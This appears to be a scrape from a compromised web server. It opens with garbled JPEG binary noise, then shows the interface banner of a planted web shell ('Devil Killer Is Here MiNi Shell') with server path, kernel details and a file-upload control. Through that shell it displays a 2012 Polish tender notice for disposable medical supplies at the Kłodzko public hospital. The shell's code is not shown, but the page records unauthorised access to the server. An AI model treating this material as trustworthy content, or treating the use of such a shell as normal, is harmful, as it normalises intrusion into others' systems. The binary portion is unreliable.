JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120606/191070-N-2012.html

<p class="kh_header"><b>Kłodzko: dostawę jednorazowego sprzętu medycyny ogólnej  dla potrzeb SP ZOZ Kłodzko</b><br>
<b>Numer ogłoszenia: 191070 - 2012; data zamieszczenia: 06.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Kłodzku , ul. Szpitalna 1, 57-300 Kłodzko, woj. dolnośląskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawę jednorazowego sprzętu medycyny ogólnej  dla potrzeb SP ZOZ Kłodzko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa jednorazowego sprzętu medycyny ogólnej dla potrzeb SP ZOZ Kłodzko..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2, 31.71.11.40-6, 33.14.00.00-3, 33.14.16.20-2, 33.14.13.20-9, 33.15.71.10-9, 34.92.84.80-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 24.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający w prowadzonym postępowaniu o udzielenie zamówienia publicznego (na podstawie art. 45 ust. 2 u.pz.p. z dnia 29 stycznia 2004 roku z późniejszymi zmianami) wymaga wadium w wysokości:
 Nr zad.       nazwa zadania                                           [zł]
1	igły	500
2	ostrza chirurgiczne	330
3	elektrody	670
4	cewniki termodylucyjne	270
5	przyrząd do przetaczania płynów	710
6	cewniki do odsysania	70
7	kaniule	1950
8	cewniki do żył centralnych	550
9	rurki intubacyjne	350
10	zestawy do dializy	350
11	szczoteczki cytologiczne	40
12	koszyczki dormia	200
13	elektrody do diatermii	300
14	maski tlenowe	140
15	pojemniki na odpady	380
16	zestawy do lewatywy	30
17	pozostałe	1900
18	produkty do odsysania i zbiórki wydzielin	320
19	igły do biopsji stercza	200
20	materiały chirurgiczne	250
21	materiały operacyjne	1600
22	zestawy do szynowania	130
23	materiały ginekologiczne do leczenia nietrzymania moczu	2800
24	prześcieradła chłonne	150


W przypadku składania oferty na więcej niż jedno zadanie, wysokość wadium to suma wadiów  poszczególnych zadań. 
Wykonawca wnoszący wadium w formie pieniężnej winien je wpłacić na konto Za-mawiającego w Banku Gospodarstwa Krajowego O/ Wrocław nr konta  27 1130 1033 0018 7998 4020 0004. 
Potwierdzenie przelewu należy dołączyć do składanej oferty. 
Złożenie wadium w innej formie (przewidzianej w art. 45 ust. 6 u.p.z.p.) Wykonawca winien potwierdzić poprzez dołączenie do oferty odpowiedniego dokumentu ( wyma-gany oryginał dokumentu).
2.	Wykonawca może wnieść wadium w formach wymienionych w art. 45 ust. 6 u.p.z.p. z dnia 29 stycznia 2004 roku z późniejszymi zmianami.
3.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej Zamawiający wymaga aby była ona bezwarunkowa, tj. jej realizacja rozpoczyna się (w przypadku wystąpienia okoliczności wymienionych w art. 51 pkt. 1 do 3 u.p.z.p. z dnia 29 stycznia 2004 roku z późniejszymi zmianami) po złożeniu przez Zamawiają-cego wezwania do zapłaty u Gwaranta, bez żadnych dodatkowych czynności ze strony Zamawiającego.
4.	Utrata wadium na rzecz Zamawiającego może nastąpić jeżeli zaistnieją okoliczności o których mowa w art. 46 ust. 5  u.p.z.p. z dnia 29 stycznia 2004 roku, z późniejszymi zmianami.
5.	Zwrot wniesionego wadium nastąpi zgodnie z art. 46 ust. 1 i 2 u.p.z.p. z dnia 29 stycznia 2004 roku z późniejszymi zmianami.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ustęp 1 ustawy z dnia 29.01.2004r. Prawo Zamówień Publicznych z późniejszymi zmianami Zamawiający informuje, że dopuszcza zmianę treści oferty po podpisaniu umowy z wyłonionymi wykonawcami w następujących przypadkach:
1.	Zmiany stawki podatku vat lub wprowadzenia innych podatków , akcyzy, opłat  przez upoważnione organy jeżeli będą dotyczyły przedmiotu zamówienia ,a któ-rych wcześniej nie można było przewidzieć. W takim przypadku ulega zmianie wysokość kwoty brutto. Cena netto pozostaje bez zmian.
2.	Przesunięcia terminu realizacji przedmiotu zamówienia w przypadku zaistnienia okoliczności niezależnych od Wykonawcy.
3.	W przypadkach określonych we wzorze umowy
Wszystkie zmiany muszą być wprowadzone w formie pisemnej aneksem do umowy pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zoz.klodzko.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ Zespół Opieki Zdrowotnej
ul. Szpitalna 1a
57-300 KŁODZKO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2012 godzina 10:00, miejsce: SP ZOZ Zespół Opieki Zdrowotnej
ul. Szpitalna 1a
57-300 KŁODZKO
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	IGŁA J.U. 0,4	1 500,000	SZT
2	IGŁA J.U. 0,5	11 000,000	SZT
3	IGŁA J.U. 0,6	9 500,000	SZT
4	IGŁA J.U. 0,7	32 000,000	SZT
5	IGŁA J.U. 0,8	84 000,000	SZT
6	IGŁA J.U. 0,9	30 000,000	SZT
7	IGŁA J.U. 1,1	17 000,000	SZT
8	IGŁA J.U. 1,2	100 000,000	SZT
9	IGŁA DO ZNIECZULEŃ P/PAJĘCZ. 22G/90	250,000	SZT
10	IGŁA I PROWADNICE Z OBSADKĄ 25G/90	300,000	SZT
11	IGŁA I PROWADNICE Z OBSADKĄ. 26G/90	400,000	SZT
12	IGŁA I PROWADNICE Z OBSADKĄ 27G/90	100,000	SZT
13	IGŁA TOUCHY 16G	50,000	SZT
14	IGŁA TOUCHY 18G	30,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ostrza chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	OSTRZA JEDNORAZOWE WYMIENNE NR 10	400,000	SZT
2	OSTRZA JEDNORAZOWE WYMIENNE NR 11	2 500,000	SZT
3	OSTRZA JEDNORAZOWE WYMIENNE NR 15	2 500,000	SZT
4	OSTRZA JEDNORAZOWE WYMIENNE NR 20	800,000	SZT
5	OSTRZA JEDNORAZOWE WYMIENNE NR 22	1 500,000	SZT
6	OSTRZA JEDNORAZOWE WYMIENNE NR 21	800,000	SZT
7	OSTRZA JEDNORAZOWE WYMIENNE NR 23	2 300,000	SZT
8	OSTRZA JEDNORAZOWE WYMIENNE NR 24	2 100,000	SZT
9	POJEMNIKI NA ODPADY 0,7L	1 500,000	SZT
10	POJEMNIKI NA ODPADY 1L	500,000	SZT
11	POJEMNIKI NA ODPADY 2L	1 000,000	SZT
12	POJEMNIKI NA ODPADY 5L	1 500,000	SZT
13	POJEMNIKI NA ODPADY 10L	1 300,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> elektrody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	ELEKTRODA DO CZASOWEJ STYMULACJI SERCA ENOKAWITARNA 6F	25,000	SZT
2	ELEKTRODA EKG	100 000,000	SZT
3	INTRODUKTOR DONACZYNIOWY 6F	30,000	SZT
4	INTRODUKTOR DONACZYNIOWY 8F	10,000	SZT
5	INTRODUKTOR DONACZYNIOWY 8,5F	10,000	SZT
6	ELEKTRODA DO DEF. QUICK COMBO DLA DOR.	80,000	SZT
7	ELEKTRODA DO DEF.QUICK COMBO DZIEC	20,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> cewniki termodylucyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	cewnik do wprowadzania do tętnicy płucnej	10,000	SZT
2	SYSTEM DO PODAWANIA PŁYNU W BADANIACH TERMODY.	10,000	SZT
3	KANIULA DOTĘTNICZA Z ZAWOREM  ODCINAJĄCYM 45MM	200,000	SZT
4	ZESTAW DO INWAZYJNEGO  POMIARU CIŚNIENIA TĘTNICZEGO	150,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> przyrząd do przetaczania płynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	PRZYRZĄD DO INFUZJI	45 000,000	SZT
2	PRZYRZĄD DO PRZETACZANIA KRWI	10 000,000	SZT
3	PRZYRZĄD DO OCŻ	200,000	SZT
4	PRZYRZĄD DO PRZYGOTOWANIA I PODAWANIA LEKÓW Z FILTREM ANTYBAKT. Z ODPOWIETRZNIKIEM	2 000,000	SZT
5	PRZEDŁUŻACZ DO POMP INFUZYJNYCH BIAŁY	1 000,000	SZT
6	PRZEDŁUŻACZ DO POMP INFUZYJNYCH BURSZTYNOWY	300,000	SZT
7	PRZEDŁUŻACZ DO POMP INFUZYJNYCH CZARNY	1 000,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> cewniki do odsysania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	CEWNIK DO ODSYSANIA CH 10/60	300,000	SZT
2	CEWNIK DO ODSYSANIA CH 12/60	300,000	SZT
3	CEWNIK DO ODSYSANIA CH 14/60	1 800,000	SZT
4	CEWNIK DO ODSYSANIA CH 16/60	1 500,000	SZT
5	CEWNIK DO ODSYSANIA CH 18/60	1 000,000	SZT
6	CEWNIK DO ODSYSANIA CH 20/60	500,000	SZT
7	CEWNIK DO ODSYSANIA CH 6/60	100,000	SZT
8	CEWNIK DO ODSYSANIA CH 8/40	1 000,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> kaniule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	KANIULA DO ŻYŁ OBWODOWYCH 0,7X19 Ż	2 000,000	SZT
2	KANIULA DO ŻYŁ OBWODOWYCH 0,6X19 F	200,000	SZT
3	KANIULA DO ŻYŁ OBWODOWYCH 0,9X25 N	20 000,000	SZT
4	KANIULA DO ŻYŁ OBWODOWYCH 1,1X32 R	20 000,000	SZT
5	KANIULA DO ŻYŁ OBWODOWYCH 1,3X32mm	7 000,000	SZT
6	KANIULA DO ŻYŁ OBWODOWYCH 1,7	400,000	SZT
7	KANIULA DO ŻYŁ OBWODOWYCH 1,5X45 B	500,000	SZT
8	RAMPA 5-KRANIKOWA	100,000	SZT
9	KORECZKI DO VENFLONÓW	15 000,000	SZT
10	KRANIK TRÓJDROŻNY	2 000,000	SZT
11	KRANIK TRÓJDROŻNY Z KRÓTKIM PRZEDŁUŻACZEM (PCV), BEZ FTALANÓW, 10CM	800,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> cewniki do żył centralnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	                                                                                        Ilość	       JM
1	CEWNIKI DO WKŁUCIA TRZYŚWIATŁOWEGO, 7F (16/18/18) DŁ.20CM	       150,000	SZT
2	CEWNIKI DO WKŁUCIA DWUŚWIATŁOWEGO, 7F (16X16),DŁ.20CM (CERTOFIX)	98,000	SZT
3	CEWNIKI DO WKŁUCIA JEDNOŚWIATŁOWEGO, DŁ.20CM, G14 (CERTOFIX)	        98,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.71.11.40-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> rurki intubacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Synonim	Ilość	JM
1	RURKA INTUBACYJNA BEZ MANKIETU 2.0	10,000	SZT
2	RURKA INTUBACYJNA BEZ MANKIETU 2.5	10,000	SZT
3	RURKA INTUBACYJNA BEZ MANKIETU 3	10,000	SZT
4	RURKA INTUBACYJNA BEZ MANKIETU 3.5	10,000	SZT
5	RURKA INTUBACYJNA BEZ MANKIETU 4	10,000	SZT
6	RURKA INTUBACYJNA BEZ MANKIETU 4.5	10,000	SZT
7	RURKA INTUBACYJNA Z MANKIETEM NISKO. 5	50,000	SZT
8	RURKA INTUBACYJNA Z MANKIETEM NISKO. 5,5	50,000	SZT
9	RURKA INTUBACYJNA Z MANKIETEM NISKO. 6	50,000	SZT
10	RURKA INTUBACYJNA Z MANKIETEM NISKO. 6,5	50,000	SZT
11	RURKA INTUBACYJNA Z MANKIETEM NISKO. 7.0	400,000	SZT
12	RURKA INTUBACYJNA Z MANKIETEM NISKO. 7.5	500,000	SZT
13	RURKA INTUBACYJNA Z MANKIETEM NISKO. 8,0	500,000	SZT
14	RURKA INTUBACYJNA Z MANKIETEM NISKO. 8,5	500,000	SZT
15	RURKA INTUBACYJNA Z MANKIETEM NISKO. 9,0	400,000	SZT
16	RURKA INTUBACYJNA Z MANKIETEM NISKO. 9,5	100,000	SZT
17	RURKA INTUBACYJNA Z MANKIETEM NISKO. 10	50,000	SZT
18	RURKA USTNO-GARDŁOWA OOO	10,000	SZT
19	RURKA USTNO-GARDŁOWA 00	10,000	SZT
20	RURKA USTNO-GARDŁOWA 0	10,000	SZT
21	RURKA USTNO-GARDŁOWA 1	30,000	SZT
22	RURKA USTNO-GARDŁOWA 2	200,000	SZT
23	RURKA USTNO-GARDŁOWA 3	200,000	SZT
24	RURKA USTNO-GARDŁOWA 4	200,000	SZT
25	RURKA USTNO-GARDŁOWA 5	200,000	SZT
26	RURKA DO TRACHEOSTOMII Z MAN. 7,0	20,000	SZT
27	RURKA DO TRACHEOSTOMII Z MAN. 7,5	20,000	SZT
28	RURKA DO TRACHEOSTOMII Z MAN. 8,0	20,000	SZT
29	RURKA DO TRACHEOSTOMII Z MAN. 8,5	20,000	SZT
30	RURKA DO TRACHEOSTOMII Z MAN. 9,0	20,000	SZT
31	RURKA DO TRACHEOSTOMII Z MAN. 10,0	20,000	SZT
32	TAŚMA MOCUJĄCA RURKĘ TRACHEOSTOMIJNĄ	100,000	SZT
33	WYMIENNIK CIEPŁA I WILGOCI DO RUREK TRACHEO.	200,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> zestawy do dializy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p. 	Synonim	Ilość	JM
1	ZESTAW DIALIZACYJNY 150SET KOMPATYBILNY Z APARATEM PRISMAFLEX	30,000	SZT
2	ZESTAW DIALIZACYJNY 100SET KOMPATYBILNY Z APARATEM PRISMAFLEX	5,000	SZT.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
